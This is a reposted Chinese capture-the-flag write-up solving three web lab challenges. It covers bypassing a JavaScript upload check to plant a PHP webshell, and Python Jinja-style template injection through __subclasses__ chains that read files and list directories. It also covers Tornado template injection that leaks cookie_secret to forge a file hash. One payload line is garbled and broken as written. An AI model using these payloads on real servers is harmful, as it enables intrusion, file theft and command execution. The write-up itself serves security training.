0


攻防世界高手进阶区upload1,Web_python_template_injection,easytornado

upload1

题目介绍

解题思路

访问靶场

上传文件

查看源码

发现用前端javascript来限制上传文件格式

关闭前端

下载插件disable javascript,关闭前端

上传websehll.php

蚁剑连接

寻找flag

在html文件夹下找到flag

找到flag

cyberpeace{71b414e237ae390d1d5fa0171dfb0bb6}

Web_python_template_injection

题目介绍

解题思路

访问靶场

判断是否为模板注入

http://111.200.241.244:58188/{{6*6}}

存在模板注入

查看全局变量

http://111.200.241.244:58188/{{config}}http://111.200.241.244:58188/{{config}}http://111.200.241.244:58188/{{config}}

魔术方法知识点

class 返回类型所属的对象

mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的

subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

init 类的初始化方法

globals 对包含函数全局变量的字典的引用

利用魔术方法

http://111.200.241.244:58188/{{''.__class__.__mro__[2].__subclasses__()}}http://111.200.241.244:58188/{{''.__class__.__mro__[2].__subclasses__()}}

http://111.200.241.244:58188/{{''.__class__.__mro__[2].__subclasses__()}}

找到type file可以进行文件读取

[40]是tupe file类型出现位置(从0开始的位置)

http://111.200.241.244:58188/{{ [].class.base.subclasses()40.read() }}

找到** <class ‘site._Printer’>可以进行命令执行**

http://111.200.241.244:58188/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

读取flag

找到flag

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

easytornado

题目介绍

解题思路

访问靶场

逐个查看文件

发现flag在/fllllllllllllag文件里

render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。

访问 /fllllllllllllag

111.200.241.244:62882/file?filename= /fllllllllllllag

出现页面error

观察页面后修改msg后面的数值

此时结合第二个文件中的提示 render,考虑此处存在 Tornado 的服务端模板注入攻击

发现确实存在 SSTI ,但是部分注入被过滤了

构造payload获取cookie_secret

cookie_secret 是存在于 settings 中的,settings 又作为参数传入了 Application 构造函数,因此可以通过 self.application.settings 来获取到 cookie_secret。又因为根据官方文档, RequestHandler.settings 的别名是 self.application.settings,且 handler 指向处理当前这个页面的 RequestHandler 对象,故最终的效果就是可以直接通过 handler.settings 来得到 cookie_secret 的值。

构造 payload,msg={{handler.settings}} 即可获取到 cookie_secret。

111.200.241.244:62882/error?msg={{handler.settings}}

根据第三个文件

对/fllllllllllllag进行md5加密

对a4509af8-8497-40e2-9dd7-e0c85c01288d和 3bf9f6cf685a6dd8defadabfb41a03a1(小写)进行加密

获得88898e58a01102c4a624fbb3934d6881

获取flag

我们得到

filename=fllllllllllllag

filehash=88898e58a01102c4a624fbb3934d6881

找到flag

flag{3f39aea39db345769397ae895edb9c70}

标签: 前端 javascript php

本文转载自: https://blog.csdn.net/m0_63127854/article/details/125231324
版权归原作者 不知名白帽 所有, 如有侵权,请联系我们删除。

“攻防世界高手进阶区upload1,Web_python_template_injection,easytornado”的评论:

还没有评论